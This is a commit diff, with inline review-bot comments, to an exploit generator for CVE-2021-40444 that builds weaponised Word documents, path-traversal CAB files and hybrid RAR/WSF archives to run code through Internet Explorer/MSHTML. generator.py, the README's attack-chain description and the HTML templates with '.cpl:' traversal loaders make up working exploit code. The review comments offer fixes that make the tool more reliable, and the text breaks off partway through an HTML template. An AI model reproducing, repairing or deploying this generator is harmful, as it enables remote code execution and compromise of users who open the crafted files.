Added CAB-based IE-only attacks, and CAB-less attacks via hybrid RAR and additional URI schemes

master
d3adc0de 2 months ago
parent
commit
a0d1b8d4c4
Files changed (lines changed in parentheses):
  1. .gitignore (3)
  2. README.md (97)
  3. bin/Rar.exe (binary)
  4. bin/RarExt.dll (binary)
  5. bin/RarExt32.dll (binary)
  6. clean.bat (8)
  7. generator.py (271)
  8. template/cab-orig-debobfuscated1.html (0)
  9. template/cab-orig-debobfuscated2.html (34)
  10. template/cab-orig-j00sean.html (79)
  11. template/cab-orig-obfuscated.html (0)
  12. template/cab-uri-debobfuscated1.html (69)
  13. template/cab-uri-debobfuscated2.html (146)
  14. template/cab-uri-obfuscated.html (3)
  15. template/cab-uri-sample1.html (75)
  16. template/cab-uri-test-obfuscated.html (13)
  17. template/cabless-rar-sample1.html (68)
  18. template/cabless-smuggling-sample1.html (109)
  19. template/index.html (376)
  20. test/calc.dll (binary)
  21. test/calc.hta (11)
  22. test/calc.js (6)
  23. test/calc.vbs (8)
  24. test/job-jscript.wsf (1)
  25. test/job-vbs.wsf (1)
  26. test/test.js (2)
  27. util/server.py (51)

.gitignore (3 lines changed)

@ -1,9 +1,8 @@
venv
out
test
srv
.idea
__pycache__
template/sample4-nw.html
!srv/index.html
setup*
*.7z

README.md (97 lines changed)

@ -34,6 +34,11 @@ There are quite a bit of overlooked requirements for this exploit to work, which
Maybe nobody explicitly "released" them to avoid the vulnerability to be exploited more. But now it's patched,
so it should not cause a lot of troubles to release the details.
#### HTML File
As for this [tweet](https://twitter.com/wdormann/status/1440036541112328199) by [Will Dormann](https://twitter.com/wdormann),
the HTML should be at least 4096 bytes in size in order to trigger the "Preview" within MS Word.
#### CAB File
The CAB file needs to be byte-patched to avoid extraction errors and to achieve the ZipSlip:
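Review bot: the wording of the context paragraph at the top of this hunk is hard to parse ("quite a bit of overlooked requirements", "to avoid the vulnerability to be exploited more"); since the hunk touches the adjacent lines anyway, consider "There are quite a few overlooked requirements for this exploit to work" and "to avoid the vulnerability being exploited further". The two new `####` subsections themselves read fine and match the heading level used elsewhere in the README.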
@ -67,6 +72,62 @@ on this. Up to the curious reader to develop this further.
**NOTE2**: Microsoft Patch blocks arbitrary URI schemes, apparently using a blacklist approach (this is just a supposition)
# DLL Attack
The main attack chain associated with CVE-2021-40444 is the DLL attack loaded via the `.cpl` URI scheme. In order to
exploit that, an attacker needs to generate a specially crafted DLL. If you want to test it out, try my [evildll-gen](https://gist.github.com/klezVirus/e24c94d7061f5736e2452eee022f4011)
script.
# JScript, VBScript, Javaw, MSIexec, ...
As noted by [Max Maluin](https://twitter.com/Max_Mal_), it is possible to interact with several filetypes abusing IE and
the associated file extension based URI. While this is might be a good way to exploit IE, it has limitations.
Indeed, irtshould be noted that the method used in the exploit to download files is based on ActiveX control updates,
and cannot be used to download arbitrary files.
As per Microsoft [documentation](https://docs.microsoft.com/it-it/cpp/mfc/upgrading-an-existing-activex-control?view=msvc-160), the `codebase` tag
can point just to a few filetypes: OCX, INF and CAB.
Even if we can directly download an OCX or INF file, we still can't be sure to download the file in the right location
within the system. With the cab exploit, it is possible to move the `.inf` file in a well-known path using the path traversal,
but in any other case the file will be stored in a random directory, making it virtually impossible to reference it.
As of today, I didn't find a way to chain download and execution WITHOUT a CAB file.
Note: Talking about IE alone, HTML smuggling could be a possible scenario to exploit the vulnerability.
# Cab-less file attack using hybrid RAR file
This technique was firstly disclosed by [Eduardo Braun](https://twitter.com/Edu_Braun_0day) on Twitter and further explained in [this](https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf) paper.
Please note that using this technique, the attack chain is a bit different. This attack requires the user to download
a specially crafted RAR file, obtained by chaining a valid WSF script and a valid RAR file. Once opened, the RAR will contain
a DOCX with a reference to an HTML, which in turn will try to load the RAR file as a WSF script.
To summarise:
1. Specially crafted RAR file is downloaded (likely Download folder)
2. DOCX extracted and opened
3. Relationship stored in document.xml.rels points to malicious html
4. IE preview is launched to open the HTML link
5. JScript within the HTML contains a script/iframe pointing to the RAR file, prefixed with the ".wsf:" URI scheme
6. As the RAR was designed to be contemporaneously a valid RAR and a valid WSF script, the script is executed
# What are the exploits PoC implemented by the tool
The generator utility can currently reproduce the following attacks:
| Attack | HTML Templates | Target | Delivery Method | Execution Method | Working |
|-------------------------------------------|---------------------|--------|-----------------|------------------|-----------------|
| Original version of the attack | cab-orig-* | WORD | DOCX | CAB + DLL | YES |
| j00sean IE-only attack | cab-orig-j00san | IE | HTML | CAB + DLL | YES |
| My version without DLL | cab-uri-* | WORD | DOCX | CAB + JS/VBS | NO<sup>1</sup> |
| Eduardo B. "CABless" attack using RAR | cabless-rar-* | WORD | RAR | WSF | YES |
| Modified j00sean attack + HTML smuggling | cabless-smuggling-* | IE | HTML | JS/VBS | YES<sup>2</sup> |
_<sup>1</sup>The CAB is not downloaded properly in some environments_
_<sup>2</sup>The user needs to click on "Save" to download the file on IE_
# CAB file parser
The utility `cab_parser.py` can be used to see the headers of the exploit file, but don't consider this a full
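Review bot: the table row for the j00sean attack names its template `cab-orig-j00san`, but the file added in this commit is `template/cab-orig-j00sean.html`; fix the spelling so the row matches the file the generator actually picks up by prefix. Two other points in the same hunk: the sentence "As of today, I didn't find a way to chain download and execution WITHOUT a CAB file" is immediately followed by a section describing a CAB-less chain, so scope it to the `codebase`/ActiveX download path ("...without a CAB file when the download goes through the `codebase` attribute"), and fix the typos "irtshould" (it should), "this is might be" (this might be), "firstly disclosed" (first disclosed) and the heading "What are the exploits PoC implemented by the tool" (e.g. "Which PoCs the tool implements").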
@ -97,10 +158,12 @@ pip install -r requirements
# Usage
The generator is trivial to use, and has been tested with a number of different DLL payloads.
The generator is trivial to use, and even if it has been tested with a number of different payloads and Windows
versions, it is not fail-proof. I'm encountering different behaviours across different Windows builds. As soon as
I have more details to share, I'll post them here.
```
usage: generator.py [-h] -P PAYLOAD -u URL [-o OUTPUT] [--host] [-p LPORT] [-c COPY_TO]
usage: generator.py [-h] -P PAYLOAD -u URL [-o OUTPUT] [--host] [-c COPY_TO] [-nc] [-t]
[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]
@ -112,14 +175,38 @@ optional arguments:
-o OUTPUT, --output OUTPUT
Output files basename (no extension)
--host If set, will host the payload after creation
-p LPORT, --lport LPORT
Port to use when hosting malicious payload
-c COPY_TO, --copy-to COPY_TO
Copy payload to an alternate path
-nc, --no-cab Use the CAB-less version of the exploit
-t, --test Open IExplorer to test the final HTML file
```
# Example
* Generate the original exploit and test it locally
```
python generator.py -u http://127.0.0.1 -P test\calc.dll --host
```
_Note: the port is selected by the URL, and the exploit is generated basing on the payload file extension_
* Generate the CABless exploit with RAR and test it locally via IE
```
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
```
* Generate the CABless exploit (IE-only) with HTML smuggling and test it locally via IE
```
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
```
# Credits
* [RET2_pwn](https://twitter.com/RET2_pwn) for the amazing blog
* [j00sean](https://twitter.com/j00sean) for the good hints
* [lockedbyte](https://github.com/lockedbyte/CVE-2021-40444) for the first decent poc
* [lockedbyte](https://github.com/lockedbyte/CVE-2021-40444) for the first decent poc
* [Max_Mal](https://twitter.com/Max_Mal) for the hint on the alternate URI schemes
* [wdormann](https://twitter.com/wdormann) for the hint on the HTML file size restrictions
* [Edu_Braun_0day](https://twitter.com/Edu_Braun_0day) for the cool CAB-less version of the exploit
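Review bot: the third Example (`-P test\calc.js --no-cab`) contradicts the new guard in `generate_payload`, which exits with "CAB-less version chosen, only .wsf is currently working" for any non-`.wsf` payload when `--no-cab` is set; either state that restriction in the Usage section and drop the example until the smuggling path is supported, or reconcile the two. Also in this hunk: the `[lockedbyte]` credit line appears twice, the old `usage:` line with `-p LPORT` is still present next to the new one, and small wording fixes: "fail-proof" (fool-proof), "basing on the payload file extension" (based on), "IExplorer" (Internet Explorer).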

bin/Rar.exe (binary)

Binary file not shown.

bin/RarExt.dll (binary)

Binary file not shown.

bin/RarExt32.dll (binary)

Binary file not shown.

clean.bat (8 lines changed)

@ -0,0 +1,8 @@
@echo off
del /F /Q "setup.inf"
del /F /Q "setup.rpt"
del /F /Q "out\*"
del /F /Q "data\*.dll"
del /F /Q "srv\*"
xcopy /Y /Q "template\index.html" "srv\"
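Review bot: each `del /F /Q` line prints "Could Not Find ..." when the target is already gone, which is the normal state on a second run; wrap them as `if exist "setup.inf" del /F /Q "setup.inf"` (same for `out\*`, `data\*.dll`, `srv\*`), or redirect with `2>nul`, so the script is quiet when there is nothing to clean. The `xcopy` line is fine; the trailing backslash on `srv\` correctly marks it as a directory.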

generator.py (271 lines changed)

@ -4,17 +4,22 @@
# Result is ability for attackers to execute arbitrary custom DLL's
# downloaded and executed on target system
import argparse
import base64
import binascii
import random
import re
import secrets
import shutil
import string
import struct
import sys
import os
import subprocess
import tempfile
import time
import traceback
from pathlib import Path
from cab_parser import Cab
from in_place import InPlace
@ -77,7 +82,103 @@ def execute_cmd(cmd, execute_from=None):
exit(1)
def generate_payload(payload, server_url, basename, copy_to=None):
def patch_rar(rar_file, script: bytes):
# JS downloader string
downloader = bytearray(script)
# Appending null byte
# downloader.append(0)
content = bytearray(open(rar_file, "rb").read())
content = bytes(downloader + content)
with open(rar_file, "wb") as rar:
rar.write(content)
def rar(file: Path, rar_file, delete=False):
try:
output = subprocess.check_output(
f"bin\\rar.exe a -ep \"{rar_file}\" \"{str(file)}\"",
stderr=subprocess.STDOUT,
shell=True
)
if delete:
file.unlink(missing_ok=True)
except subprocess.CalledProcessError:
print("[-] Error generating RAR archive")
exit(1)
def make_rar(rar_file):
file_name = None
with tempfile.NamedTemporaryFile(
suffix=".txt",
delete=False,
mode="w"
) as txt_file:
txt_file.write("You've been pwnd!")
file_name = Path(txt_file.name).absolute()
rar(file_name, rar_file, delete=True)
def choose_template(templates: list):
try:
print("[*] Multiple compatible templates identified, choose one:")
choice = -1
for n, t in enumerate(templates, start=0):
print(f" {n}: {t}")
while not 0 <= choice <= len(templates) - 1:
try:
choice = int(input(" $> "))
except ValueError:
continue
return templates[choice]
except KeyboardInterrupt:
print("[-] Aborting")
sys.exit(1)
def append_garbage(content: str, exploit: str):
eol = '\n'
garbage = ""
filler = "A" * 80000
if exploit == ".vbs":
eol = '" _ \n & "'
garbage = rf"""
Dim Garbage
Garbage = "{eol.join([filler[i:i + 100] for i in range(0, len(filler), 100)])}";
"""
elif exploit == ".js":
garbage = f"var x = '';{eol}" + eol.join([f"x = '{filler[i:i + 100]}';" for i in range(0, len(filler), 100)])
elif exploit in [".wsf", ".hta"]:
garbage = f"<!--{eol}{filler}{eol}-->{eol}"
return content + garbage
def get_file_extension_based_uri(exploit, no_cab=False):
if exploit == ".dll":
return ".cpl"
elif exploit in [".hta", ".js", ".vbs", ".wsf", ".hta"] and no_cab:
return exploit
elif exploit in [".hta", ".js", ".vbs", ".wsf", ".hta"]:
return ".wsf"
def get_mime_type(exploit):
if exploit == ".dll":
return "application/octet-stream"
elif exploit == ".hta":
return "application/hta"
elif exploit == ".js":
return "text/javascript"
elif exploit == ".vbs":
return "text/vbscript"
elif exploit == ".wsh":
return "text/plain"
elif exploit == ".wsf":
return "text/xml"
def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False):
# Current Working Directory
working_directory = Path(__file__).parent
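Review bot: `get_file_extension_based_uri` lists `".hta"` twice in both membership checks, and, like `get_mime_type`, it silently returns `None` for any extension it does not recognise (note that `get_mime_type` handles `".wsh"` while the URI function does not); that `None` is later passed to `str.replace` in `generate_payload`, so an unexpected payload extension fails with an unhelpful `TypeError` instead of a clear message. Add an explicit `else` branch that prints the unsupported extension and exits. Two smaller points in the same hunk: `patch_rar` reads the archive with a bare `open(rar_file, "rb").read()`, leaking the handle until garbage collection; `Path(rar_file).read_bytes()` is shorter and closes it. And `make_rar` is not called by anything else in this diff; if it is unused, drop it rather than leave it as dead code.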
@ -94,9 +195,34 @@ def generate_payload(payload, server_url, basename, copy_to=None):
word_dll = data_path.joinpath(f'{basename}.dll')
word_doc = out_path.joinpath('document.docx')
ddf = data_path.joinpath('mswordcab.ddf')
cab_file = out_path.joinpath(f"{basename}.cab")
inf_file = cab_path.joinpath(f"{basename}.inf")
html_template_file = template_path.joinpath("sample3.html")
archive_file = out_path.joinpath(f"{basename}.cab")
rar_file = out_path.joinpath(f"{basename}.rar")
exploit_file = cab_path.joinpath(f"{basename}.inf")
exploit = os.path.splitext(args.payload)[1]
if no_cab and exploit != ".wsf":
print("[-] CAB-less version chosen, only .wsf is currently working")
exit(1)
lolbin = exploit not in [".dll"]
if exploit == ".wsf" and no_cab:
id = "cabless-rar-"
elif lolbin and no_cab:
id = "cabless-smuggling-"
elif lolbin:
id = "cab-uri-"
else:
id = "cab-orig-"
script_file = None
templates = [
f for f in os.listdir(str(template_path))
if os.path.isfile(os.path.join(str(template_path), f))
and f.find(id) > -1
]
html_template_file = template_path.joinpath(choose_template(templates))
html_final_file = srv_path.joinpath(f"{basename}.html")
# Checking ephemeral directories
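Review bot: `exploit = os.path.splitext(args.payload)[1]` reaches into the module-level `args` from inside `generate_payload`, even though the function already receives the path as its `payload` parameter; use `os.path.splitext(payload)[1]` so the function works when called from anywhere other than `__main__`. Also, `id` shadows the built-in; `template_prefix` says what it is. Finally, if no template matches the prefix, `templates` is empty and `choose_template` can never return: its loop condition `0 <= choice <= len(templates) - 1` is unsatisfiable for an empty list, so check for an empty list here and exit with a message naming the prefix that was searched.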
@ -106,25 +232,44 @@ def generate_payload(payload, server_url, basename, copy_to=None):
out_path.mkdir(exist_ok=True)
print(f' [>] Payload: {payload}')
print(f' [>] HTML/CAB Hosting Server: {server_url}')
print(f' [>] HTML/CAB/JS Hosting Server: {server_url}')
b64_payload = None
payload_content = None
try:
payload_content = open(payload, 'rb').read()
if exploit != ".dll" and no_cab:
payload_content = open(payload, 'r').read().strip().encode()
elif exploit != ".dll":
payload_content = "\x5a\x4d" + open(payload, 'r').read().strip()
payload_content = append_garbage(payload_content, exploit)
payload_content = payload_content.encode()
else:
payload_content = open(payload, 'rb').read()
with open(str(word_dll), 'wb') as filep:
filep.write(payload_content)
b64_payload = base64.b64encode(payload_content).decode()
except FileNotFoundError:
print('[-] DLL Payload specified not found!')
print('[-] Payload specified not found!')
exit(1)
except Exception as e:
print(f"[-] Exception: {e}")
exit(1)
if lolbin and no_cab:
tmp = Path(exploit_file.parent).joinpath(basename + get_file_extension_based_uri(exploit))
exploit_file.unlink(missing_ok=True)
exploit_file = Path(tmp)
with open(str(exploit_file), "w") as out:
out.write(payload_content.decode())
print(f"[*] Exposing script file {exploit_file.name} to the webserver for download")
shutil.copy(str(exploit_file), str(srv_path))
shutil.copytree(str(word_dat_path), str(tmp_path), dirs_exist_ok=True)
print('[*] Crafting Relationships to point to HTML/CAB Hosting Server...')
print('[*] Crafting Relationships to point to HTML/CAB/JS Hosting Server...')
with InPlace(str(tmp_path.joinpath("word").joinpath("_rels").joinpath('document.xml.rels'))) as rels:
xml_content = rels.read()
xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}')
xml_content = xml_content.replace('<INF_CHANGE_HERE>', inf_file.name)
# xml_content = xml_content.replace('<INF_CHANGE_HERE>', inf_file.name)
rels.write(xml_content)
print('[*] Packing MS Word .docx file...')
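Review bot: the payload file is opened up to twice without a context manager (`open(payload, 'rb').read()` on the first line of the `try`, then `open(payload, 'r').read()` again in the branches), so the first read is wasted and neither handle is closed explicitly; read the bytes once with `Path(payload).read_bytes()` and decode in the text branches. The `tmp = Path(...)` followed by `exploit_file = Path(tmp)` is a redundant re-wrap; assign `exploit_file` directly. Lastly, the commented-out `# xml_content = xml_content.replace('<INF_CHANGE_HERE>', inf_file.name)` should either be deleted or replaced by a comment explaining why the placeholder in `document.xml.rels` is no longer substituted; dead code here will confuse the next reader of the rels template.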
@ -133,18 +278,19 @@ def generate_payload(payload, server_url, basename, copy_to=None):
shutil.move(str(word_doc) + ".zip", str(word_doc))
shutil.rmtree(str(tmp_path))
print('[*] Generating CAB file...')
make_ddf(ddf_file=ddf, cab_file=cab_file, inf_file=inf_file)
shutil.move(word_dll, inf_file)
if not no_cab:
print('[*] Generating CAB file...')
make_ddf(ddf_file=ddf, cab_file=archive_file, inf_file=exploit_file)
shutil.move(word_dll, exploit_file)
execute_cmd(f'makecab /F "{ddf.absolute()}"', execute_from=str(working_directory))
patched_path = f'../{inf_file.name}'.encode()
patch_cab(cab_file, str(inf_file.name).encode(), patched_path)
shutil.copy(cab_file, srv_path)
shutil.copy(ddf, srv_path)
execute_cmd(f'makecab /F "{ddf.absolute()}"', execute_from=str(working_directory))
patched_path = f'../{exploit_file.name}'.encode()
patch_cab(archive_file, str(exploit_file.name).encode(), patched_path)
shutil.copy(archive_file, srv_path)
shutil.copy(ddf, srv_path)
word_dll.unlink(missing_ok=True)
inf_file.unlink(missing_ok=True)
exploit_file.unlink(missing_ok=True)
ddf.unlink(missing_ok=True)
shutil.rmtree(str(cab_path.absolute()))
@ -156,25 +302,55 @@ def generate_payload(payload, server_url, basename, copy_to=None):
dest.unlink(missing_ok=True)
shutil.copy(str(word_doc.absolute()), dest)
if copy_to and os.path.isdir(copy_to):
if copy_to and os.path.isdir(copy_to) and not no_cab:
print(f'[*] Copying malicious cab to {copy_to} for analysis...')
dest = Path(copy_to).joinpath(cab_file.name)
dest = Path(copy_to).joinpath(archive_file.name)
dest.unlink(missing_ok=True)
shutil.copy(str(cab_file.absolute()), dest)
print(f' [>] CAB file stored at: {cab_file}')
shutil.copy(str(archive_file.absolute()), dest)
print(f' [>] CAB file stored at: {archive_file}')
with InPlace(str(html_final_file)) as p_exp:
content = p_exp.read()
content = content.replace('<HOST_CHANGE_HERE>', f"{server_url}/{cab_file.name}")
content = content.replace('<INF_CHANGE_HERE>', f"{inf_file.name}")
content = content.replace('<HOST_CHANGE_HERE>', f"{server_url}/{archive_file.name}")
content = content.replace('<INF_CHANGE_HERE>', f"{exploit_file.name}")
content = content.replace('<RAR_CHANGE_HERE>', f"{rar_file.name}")
content = content.replace('<URI_SCHEME_HERE>', get_file_extension_based_uri(exploit))
content = content.replace('<BASE64_DATA_HERE>', b64_payload)
content = content.replace('<MIME_TYPE_HERE>', get_mime_type(exploit))
content = content.replace('<FIRST_LETTER>', get_file_extension_based_uri(exploit)[1])
content = content.replace('<SECOND_LETTER>', get_file_extension_based_uri(exploit)[2])
content = content.replace('<THIRD_LETTER>', get_file_extension_based_uri(exploit)[3])
p_exp.write(content)
print(f'[+] Success! MS Word Document stored at: {word_doc}')
if exploit == ".wsf" and no_cab:
print(f"[*] Generating RAR file {rar_file.name}... and pushing it to 'Downloads', to emulate user download")
rar_dest = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath(rar_file.name)
wsf_file = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath("test.wsf")
rar(word_doc, rar_dest, delete=False)
patch_rar(rar_file=rar_dest, script=payload_content)
shutil.copy(str(rar_dest), str(srv_path))
shutil.copy(str(rar_dest), str(wsf_file))
return html_final_file.name
def start_server(lport, directory: Path):
this = Path(__file__).parent.joinpath("util").joinpath("server.py")
subprocess.Popen(
f'start /D "{directory.absolute()}" "CVE-2021-40444 Payload Delivery Server" cmd /c python -m http.server {lport}',
f'start /D "{directory.absolute()}" "CVE-2021-40444 Payload Delivery Server" cmd /c python "{this.absolute()}" localhost {lport}',
shell=True,
close_fds=True,
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
creationflags=subprocess.DETACHED_PROCESS
)
def start_client(url):
subprocess.Popen(
f'"C:\\Program Files\\Internet Explorer\\iexplore.exe" "{url}"',
shell=True,
close_fds=True,
stderr=subprocess.DEVNULL,
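Review bot: the `.wsf` no-cab branch writes two files into the user's `%USERPROFILE%\Downloads` folder (the RAR and a `test.wsf` copy) as a side effect of plain generation, outside the project's `out`/`srv` directories; since the comment says this is only to "emulate user download", make it opt-in (for instance only when `--test` is set, or honour `--copy-to`) and say so in the README. Also guard the environment lookup: `os.getenv("USERPROFILE")` returns `None` when the variable is unset (any non-Windows host), and `Path(None)` raises `TypeError` rather than a readable error. A minor ordering point: "[+] Success! MS Word Document stored at" is printed before the RAR generation that follows it, so a failure in `rar()` comes after a success message.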
@ -209,20 +385,53 @@ if __name__ == '__main__':
help="Output files basename (no extension)")
parser.add_argument('--host', action='store_true', default=False, required=False,
help="If set, will host the payload after creation")
parser.add_argument('-p', '--lport', type=int, default=8080, required=False,
help="Port to use when hosting malicious payload")
parser.add_argument('-c', '--copy-to', type=str, default=None, required=False,
help="Copy payload to an alternate path")
parser.add_argument('-nc', '--no-cab', action='store_true', default=False, required=False,
help="Use the CAB-less version of the exploit")
parser.add_argument('-t', '--test', action='store_true', default=False, required=False,
help="Open IExplorer to test the final HTML file")
args = parser.parse_args()
filename = validate_filename(args.output)
print('[*] Generating a malicious payload...')
html = None
server = args.url
port = 80
try:
scheme, ip = server.split(":")[0], server.replace("//", "/").split("/")[1]
if scheme == "http":
port = 80
elif scheme == "https":
port = 443
else:
raise NotImplemented(f"Scheme {scheme} is not supported")
if len(server.split(":")) > 2:
port = int(server.split(":")[2].split("/")[0])
except NotImplemented as e:
print(f"[-] {e}")
exit(1)
except (ValueError, KeyError, IndexError):
print("[-] Wrong URL format")
exit(1)
try:
generate_payload(payload=args.payload, server_url=args.url, basename=filename, copy_to=args.copy_to)
html = generate_payload(payload=args.payload, server_url=server, basename=filename, copy_to=args.copy_to,
no_cab=args.no_cab)
except (SystemExit, KeyboardInterrupt):
exit(1)
except:
traceback.print_exc()
if args.host:
print('[*] Hosting HTML Exploit...')
start_server(lport=args.lport, directory=Path(__file__).parent.joinpath("srv"))
exit(1)
if args.host and html:
print(f'[*] Hosting HTML Exploit at {args.url}:{port}/{html}...')
start_server(lport=port, directory=Path(__file__).parent.joinpath("srv"))
if args.test:
if os.path.splitext(args.payload)[1] != ".wsf":
print(f"[-] IE testing might not compatible with {os.path.splitext(args.payload)[1]}")
print(f'[*] Opening IE at {args.url}/{html}...')
time.sleep(3)
start_client(f"{args.url}/{html}")
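Review bot: `raise NotImplemented(f"Scheme ...")` is wrong: `NotImplemented` is a singleton return value, not an exception class, so calling it raises `TypeError: 'NotImplementedType' object is not callable`, and the matching `except NotImplemented as e:` is itself rejected with a `TypeError` when Python tries to match it; use `NotImplementedError` in both places (or simply print and exit, as the neighbouring branches do). The hand-rolled scheme/host/port splitting can be replaced by `urllib.parse.urlparse(server)`, which gives `.scheme`, `.hostname` and `.port` (with `.port` as `None` when absent, so the 80/443 default logic stays) and avoids the fragile `replace("//", "/").split("/")[1]`; `ip` is assigned and never used. Minor: "IE testing might not compatible" should read "might not be compatible".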

template/sample2.html → template/cab-orig-debobfuscated1.html (renamed, 0 lines changed)

template/sample3.html → template/cab-orig-debobfuscated2.html (renamed, 34 lines changed)

@ -105,39 +105,39 @@ function getValue(totalExpectedResults, entrySelector) {
s["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](view["Script"]["document"]["body"], s);
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
iedom["Script"]["location"] = ".cpl" + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
/** @type {string} */
rp_test["Script"]["location"] = "." + _ + colname + i + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
rp_test["Script"]["location"] = ".cpl" + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
/** @type {string} */
htmlfile["Script"]["location"] = "." + _ + colname + i + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
htmlfile["Script"]["location"] = ".cpl" + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
fake["Script"]["location"] = ".cpl" + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
/** @type {string} */
doc["Script"]["location"] = "." + _ + colname + i + ":../../../../../Temp/Low/<INF_CHANGE_HERE>";
doc["Script"]["location"] = ".cpl" + ":../../../../../Temp/Low/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../../../../Temp/<INF_CHANGE_HERE>";
fake["Script"]["location"] = ".cpl" + ":../../../../../Temp/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../Low/<INF_CHANGE_HERE>";
fake["Script"]["location"] = ".cpl" + ":../../Low/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../<INF_CHANGE_HERE>";
fake["Script"]["location"] = ".cpl" + ":../../<INF_CHANGE_HERE>";
}();
</script>
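Review bot: the hunk replaces the concatenated `"." + _ + colname + i` with the literal `".cpl"` in seventeen places, and nine of the resulting lines are identical assignments of `".cpl" + ":123"` to the same `iedom["Script"]["location"]`. If the repetition is intentional, a one-line comment saying so would stop the next reader from collapsing it; if it is merely a de-obfuscation artefact, a short loop makes the template much easier to diff against the obfuscated original. Either way, the stale `/** @type {string} */` annotations above each assignment no longer describe anything and can go.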

template/cab-orig-j00sean.html (79 lines changed)

@ -0,0 +1,79 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
<title>CVE-2021-40444</title>
</head>
<body>
<script>
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
